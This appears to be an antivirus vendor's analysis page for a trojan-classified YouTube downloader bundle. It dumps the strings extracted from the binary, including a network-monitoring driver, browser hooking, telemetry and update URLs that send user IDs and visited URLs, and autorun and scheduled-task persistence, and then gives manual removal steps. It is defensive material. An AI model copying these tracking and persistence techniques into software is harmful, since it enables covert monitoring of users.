[CRtmpPacket::ParseHeader] Info Field: %d

[CRtmpPacket::ParseHeader] ___Warning - Packet Length: %d > 1M

[CRtmpPacket::ParseHeader] Packet Type: %d

[CRtmpPacket::ParseHeader] Packet Size: %d

[CRtmpPacket::ParseHeader] Time: %d

[CRtmpPacket::ParseHeader] Channel: %d

[CRtmpPacket::ParseHeader] Header Type: %d

[CRtmpPacket::ParseHeader] Header Size: %d

[CRtmpPacket::ParseHeader] Header Byte: 0x%.02X

[CRtmpPacket::ParseHeader] ___Warning - %d/%d header bytes

[CRtmpPacket::ParseHeader] ___Error - No bytes to analyze

[CRtmpPacket::ParseHeader] ___Error - Header already parsed

[CRtmpParser::Stop]

[CRtmpParser::ProcessData] ___Error - Unknown Packet Type: %d, Offset: %d

[CRtmpParser::ProcessData] Analyze Data: %d bytes

[CRtmpParser::ProcessData] ___Warning - Packet not ready for Data Processing

[CRtmpParser::OnHandshake] Step 4: Complete

[CRtmpParser::OnHandshake] Step 3: Complete

[CRtmpParser::OnHandshake] Step 2 - Server version: %d.%d.%d.%d

[CRtmpParser::OnHandshake] Step 2 - Server up time: %d

[CRtmpParser::OnHandshake] Step 1 - Client version: %d.%d.%d.%d

[CRtmpParser::OnHandshake] Step 1 - Client up time: %d

[CRtmpParser::OnHandshake] Protocol State: %d

[CRtmpParser::OnAudio]

[CRtmpParser::OnVideo]

[CRtmpParser::OnFLV]

[CRtmpParser::OnData]

[CRtmpParser::SetTimeStartPosition] Time: %d

[CRtmpParser::SetTimeEndPosition] Time: %d

[CRtmpParser::Close]

[CRtmpParser::OnError]

[CRtmpParser::SetAbsoluteTime] Client Absolute Time: %d (Max: %d)

[CRtmpParser::SetAbsoluteTime] Server Absolute Time: %d (Max: %d)

[CRtmpParser::Sync - %p]

[CRtmpParser::ParseFlvHeader]

[CRtmpParser::ParseData] Accumulated all %d/%d bytes

[CRtmpParser::ParseData] Chunk not ready

[CRtmpParser::ParseData] Going to append %d bytes

[CRtmpParser::ParseData] Got all %d/%d bytes

[CRtmpParser::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)

[CRtmpParser::ParseData] ___Warning no data

[CRtmpParser::ParseData]

[CRtmpParser::ParseDataType] ___Error - Unknown Data Type: %d, Offset: %d

[CRtmpParser::ParseDataType] Date %f %d (Offset: %d)

[CRtmpParser::ParseDataType] Static Array %d (Offset: %d)

[CRtmpParser::ParseDataType] EOF Object (Offset: %d)

[CRtmpParser::ParseDataType] ECMA Array %d (Offset: %d)

[CRtmpParser::ParseDataType] Object (Offset: %d)

[CRtmpParser::OnChangeChunkSize] %d -> %d

[CRtmpParser::OnChangeChunkSize]

[CRtmpParser::OnReadBytes] Bytes read: %d

[CRtmpParser::OnReadBytes]

[CRtmpParser::OnMetadata]

[CRtmpParser::Reset - %p]

[CRtmpParser::ReadObject] ___Error %s - %d (Offset: %d) - Unknown Data Type

[CRtmpParser::ReadObject] EOF Object (Offset: %d)

[CRtmpParser::ReadObject] %s - Long String: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Date: %g (Offset: %d)

[CRtmpParser::ReadObject] %s - Static Array: %d (Offset: %d)

[CRtmpParser::ReadObject] %s - ECMA Array: %d (Offset: %d)

[CRtmpParser::ReadObject] %s - NULL (Offset: %d)

[CRtmpParser::ReadObject] %s - Object (Offset: %d)

[CRtmpParser::ReadObject] %s - String: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Boolean: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Numeric: %g (Offset: %d)

[CRtmpParser::ParseHandshakeHeader] Protocol - RTMPE

[CRtmpParser::ParseHandshakeHeader] Protocol - RTMP

[CRtmpParser::ParseHandshakeHeader]

[CRtmpParser::ParseHeader] Absolute Time: %d

[CRtmpParser::ParseHeader] New Time: %d

[CRtmpParser::ParseHeader] New Absolute Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Info Field: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer Bytes: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer Length: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer: %p

[CRtmpParser::ParseHeader] _Prev Packet - Packet Type: %d

[CRtmpParser::ParseHeader] _Prev Packet - Packet Size: %d

[CRtmpParser::ParseHeader] _Prev Packet - Absolute Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Original Header Size: %d

[CRtmpParser::ParseHeader]

[CRtmpParser::UpdateBufferFromServer] Analyzed no bytes

[CRtmpParser::UpdateBufferFromServer] Analyzed %d/%d, Write: %d, Discard: %d

[CRtmpParser::UpdateBufferFromServer] Analyze Next Buffer... (Left: %d)

[CRtmpParser::UpdateBufferFromServer] Decrypt %d/%d bytes

[CRtmpParser::UpdateBufferFromServer] *** Data file Ended at Absolute Time: %d ***

[CRtmpParser::UpdateBufferFromServer] *** Data file Started at Absolute Time: %d ***

[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard the rest of the data!

[CRtmpParser::UpdateBufferFromServer] Decrypt %d bytes

[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard all data!

[CRtmpParser::UpdateBufferFromServer] Analyzing %d bytes...

[CRtmpParser::UpdateBufferFromClient] Analyzed %d/%d, Write: %d, Discard: %d

[CRtmpParser::UpdateBufferFromClient] Encrypt %d bytes

[CRtmpParser::UpdateBufferFromClient] Decrypt %d/%d bytes

[CRtmpParser::ParseBuffer] Analyze Next Packet... (Left: %d)

[CRtmpParser::UpdateBufferFromClient] Decrypt %d bytes

[CRtmpParser::UpdateBufferFromClient] ___Warning - Wait for the server handshake to complete...

[CRtmpParser::UpdateBufferFromClient] Analyzed no bytes

[CRtmpParser::UpdateBufferFromClient] Analyzing %d bytes...

[CRtmpParser::operator = %p] <= %p

[CRtmpParser::ParseFlvBuffer] Analyze Next FLV Buffer...

[CRtmpParser::AddDownloadFlowCommand] Method: %s -> Command: %s, Param: %d

[CRtmpParser::OnPing] SWFVerification

[CRtmpParser::OnPing] Time: %d

[CRtmpParser::OnPing] -- Unknown %d --

[CRtmpParser::OnPing] Stream buffer ready %d

[CRtmpParser::OnPing] Pause time: %d

[CRtmpParser::OnPing] Stream buffer empty %d

[CRtmpParser::OnPing] Pong %d

[CRtmpParser::OnPing] Stream is recorded %d

[CRtmpParser::OnPing] Ping %d

[CRtmpParser::OnPing] Stream dry %d

[CRtmpParser::OnPing] Stream EOF %d

[CRtmpParser::OnPing] Stream begin %d

[CRtmpParser::OnPing] Type: %d

[CRtmpParser::OnPing]

[CRtmpParser::OnServerBW] Server Bandwidth: %d

[CRtmpParser::OnServerBW]

[CRtmpParser::OnClientBW] Client Bandwidth: %d

[CRtmpParser::OnClientBW]

[CRtmpParser::OnInvoke] ___Error - Unknown Invokde method: %s

[CRtmpParser::OnInvoke] setBandwidthLimit( %g, %g )

[CRtmpParser::OnInvoke] getStats

[CRtmpParser::OnInvoke] secureTokenResponse: Token = %s

[CRtmpParser::OnInvoke] closeStream: StreamID = %g

[CRtmpParser::OnInvoke] deleteStream: StreamID = %g

[CRtmpParser::OnInvoke] releaseStream: PlayPath = %s

[CRtmpParser::OnInvoke] startStream: PlayPath = %s

[CRtmpParser::OnInvoke] createStream: StreamID = %g

[CRtmpParser::OnInvoke] %s( '%s', '%s', '%s' )

[CRtmpParser::OnInvoke] %s( '%s', '%s' )

[CRtmpParser::OnInvoke] seek( '%d' )

[CRtmpParser::OnInvoke] %s( '%d', '%g' )

[CRtmpParser::OnInvoke] %s( '%s' ), PacketInfo: %d

[CRtmpParser::OnInvoke] onStatus - code: %s, level: %s

[CRtmpParser::OnInvoke] _error - code: %s, level: %s

[CRtmpParser::OnInvoke] %s( '%s' )

[CRtmpParser::OnInvoke] _result createStream: StreamID = %g

[CRtmpParser::OnInvoke] _result connect - AMF3

[CRtmpParser::OnInvoke] _result connect: %s

[CRtmpParser::OnInvoke] _result for Method: %s

[CRtmpParser::OnInvoke] Method: %s

[CRtmpParser::OnInvoke]

Download Helper SendMsgToBtn, url: %s

Could not find converter registry key, %ws

Could not create process, error %x, proc %ws

RegContentType%d

RegRawData%d

RegProtocol%d

RegAgent%d

RegCookie%d

1.0.1.0

RegFileName%d

RegUrl

RegURL%d

%ws_%d.log

- Mozilla Firefox

- Windows Internet Explorer

opera

firefox

chrome

OPERA

opera.exe

safari.exe

firefox.exe

iexplore.exe

chrome.exe

explorer.exe

Google Chrome

Chrome_WidgetWin_1

Firefox

FirefoxBrowserWindow Found browser window, 0x%x

FirefoxBrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

OperaBrowserWindow Found button window, 0x%x

Opera

SafariBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

hXXp://VVV.youtube.com/watch?v=

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1

YTParser url not valid %ws

SBMonitor.log

Error no signature found at %s

GetVideoUrlAndSizeFromWatchPage Could not extract url_encoded_fmt_stream_map params.

GetVideoUrlAndSizeFromWatchPage

YTParser could not find valid url, not downloading

hXXp://VVV.youtube.com/get_video_info?video_id=

GetVideoUrlAndSizeFromVideoInfo

Failed processing urls from watch page.

reportLevel

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

(build %d)

Windows 2000

Windows XP

Web Edition

Windows Server 2003,

Windows XP Professional x64 Edition

Windows Home Server

Windows Storage Server 2003

Windows Server 2003 R2,

Web Server Edition

Windows Server 2008 R2

Windows 8

Windows 7

Windows Server 2008

Windows Vista

{X-hX-hX-XX-XXXXXX}

sbmntr.sys

Converter.exe

DownloadHelper.exe

HELPEREXELOCATION

YTDownloader.exe

MONITOREXELOCATION

hXXp://VVV.ytdownloader.com/feedback/

Driver - %ws: %x

\\.\SBMonitor

net.exe

Driver installed, NOT loaded: %s

Driver installed, loaded from %s

Software\Opera Software\

%programFiles%\Opera\opera.exe

Apple Application Support\WebKit2WebProcess.exe

Safari.exe

%programFiles%\Safari\Safari.exe

%programFiles%\Mozilla Firefox\firefox.exe

IEXPLORE.EXE

%programFiles%\Internet Explorer\iexplore.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%LOCALAPPDATA%\Google\Chrome\Application\chrome.exe

converter.exe

webm

[CMonitor::AddAppIdToDriver]___Error: Could not add App Ids (%x).

Same as one of buttons PID %d

Same as our PID %d

[CMonitor::EnableMonitoring]___Error: Could not enable monitoring device (%x).

___Error: Could not open device (%u).

-pid %d -size %s -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -useragent %s -resolution %s -protocol http

CMonitor::BuildParams Already created similar url, %ws

CMonitor::BuildParams Button exists for similar url, %ws

youtube.com

-pid %d -size %I64d -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -ads %s -useragent %s -protocol http

-pid %d -rawdata %s -protocol rtmp -duration %s -resolution %s

Fwpuclnt.dll

https

Not application/octet-stream video and the size is bigger than %d, %d

Not application/octet-stream video and the size is smaller than %d

Not FLV video and the size is smaller than %d

vid2.ak.dmcdn.net

CHttpMonitor::SameYoutubeVideo Same params page id = %s, itag = %s

CHttpMonitor::SameYoutubeVideo DASH same params page id = %s, itag = %s

CHttpMonitor::SameYoutubeVideo Same watch page %s

HTTP_Version_String

[HttpParser::ParseLine] ___Error: The field separator was not found in the line:

VVV.google.com

Global\{9DA0BEED-7248-450a-B27C-C0409BDC377D}

YTD-icon-128x128.png

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

%saction=%s&userid=%s&usid=%s&aff=%s&v=%s&url=%s&title=%s&pingtext=%s&protocol=%s&size=%I64d&ref=%s&browser=%s

hXXp://rep.ytdownloader.com/app/ping.ashx?

%s%s%s

[RtmpDownloader::CreateProcessStdoutPipe] ___Error SetHandleInformation: %d

[RtmpDownloader::CreateProcessStdoutPipe] ___Error CreatePipe: %d

[RtmpDownloader::CreateProcessStdoutPipe] ___Error StdOut CloseHandle: %d

rtmpdump.exe

[RtmpDownloader::ReadFromPipe] --- Download Ends ---

[RtmpDownloader::ReadFromPipe] --- Download Begins ---

[RtmpDownloader::RunCommandLine] ___Error CreateProcess: %s. LE: %d

Error : failed to run FFmpeg - %d

[RtmpDownloader::RunCommandLine] ___Error CreateProcessStdoutPipe

Failed to run update (%x).

Trying to execute an update.

CUpdater::parseUpdateXML Set report level to %ws

REPORT

CMDLINE

%sid=%d_r=%lld_err=%d

%suserid=%s&aff=%s&v=%s

hXXp://VVV.ytdownloader.com/app/update.ashx?

mscoree.dll

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

ADVAPI32.DLL

WUSER32.DLL

<>"#%{}|\^~[]`' ?&

%Program Files%\YTDownloader\YTDownloader.exe

1.0.3.9

sma.exe_2100:

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

%%x

InternetOpenUrlA

HttpQueryInfoW

HttpSendRequestExW

HttpOpenRequestW

InternetCrackUrlW

WININET.dll

KERNEL32.dll

USER32.dll

ShellExecuteW

SHELL32.dll

GetNamedPipeInfo

GetCPInfo

GetProcessHeap

zcÁ

.?AVHttpInvoker@Agent@SpeedBit@@

.?AVImplementation@HttpInvoker@Agent@SpeedBit@@

.?AVCCDHTTPEngine@@

.?AVCCDHTTPGenericRequest@@

.?AVCCDHTTPUploader@@

.?AVJOB_HTTP@@

.?AVHTTPJOB@@

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

4R5F5u5

8"8(8,82868>8

2 2$2(2,2

7 7$7(7,7

kernel32.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

/Url:

Utils::SynchronousPipe::IsPipe

Utils::SynchronousPipe::Read

Agent::HttpInvoker::Create

Agent::HttpInvoker::UploadData

Agent::HttpInvoker::DownloadData

Utils::SynchronousPipe::Write

A[Agent::HttpInvoker::UploadData]

[Agent::HttpInvoker::DownloadData]

CCDJobMgr::AddHTTPGenericJob

@logs\${ModuleName}.${Pid}.log

@KERNEL32.DLL

Content-Type: application/x-www-form-urlencoded

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

@[SynchronousPipe::Write]

[SynchronousPipe::Read]

%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe

2, 3, 12, 1634

sma.exe

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

smu.exe:2964
smu.exe:3720
smu.exe:2764
BROWSE~2.EXE:3272
BrowserHelper.exe:1284
sc.exe:3048
sc.exe:3252
sc.exe:2908
sc.exe:364
wscript.exe:3544
net1.exe:3620
net1.exe:3204
%original file name%.exe:1736
net.exe:3184
net.exe:3552
ins_ytd.exe:2552
DC%original file name%.exe:232
DC%original file name%.exe:1276
nsB.tmp:2636
sma.exe:4012
sma.exe:4024
sma.exe:2100
sma.exe:4028
sma.exe:3160
setup.exe:2860
tcpsvcs.exe:2536
tcpsvcs.exe:2284
find.exe:2092
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%WinDir%\Temp\vup.tmp (94 bytes)
%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (411 bytes)
%WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (35967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\DC%original file name%.exe (380759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\D1989.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5E9581DB5A683B1D (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup.exe (1824812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup1.exe (164931 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss5.tmp (176533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\D1958.dll (14 bytes)
%WinDir%\Tasks\Inst_Rep.job (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_9382\bxsdk32.dll (2386 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_8361\DC%original file name%.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_9382\ins_ytd.exe (61832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KAHI9BF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ABGH4T4P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GZQNMLYL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_13875\DC%original file name%.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2N3SX0SU\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (19592 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (64932 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (70495 bytes)
%Program Files%\YTDownloader\Unelevate.exe (3312 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (16424 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoD.tmp (275210 bytes)
%Program Files%\YTDownloader\Updater.exe (25824 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (13584 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (6360 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (7192 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\libeay32.dll (33455 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20624 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\convert_ani.gif (784 bytes)
%Program Files%\YTDownloader\converter.exe (68799 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\AccDownload.dll (9320 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\AccD.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsProcess.dll (4 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso8.tmp (244481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\System.dll (11 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\SMWPUpd.job (2154 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Win32.Swrort.3_fc40ca97e6

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Win32.Swrort.3_fc40ca97e6

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet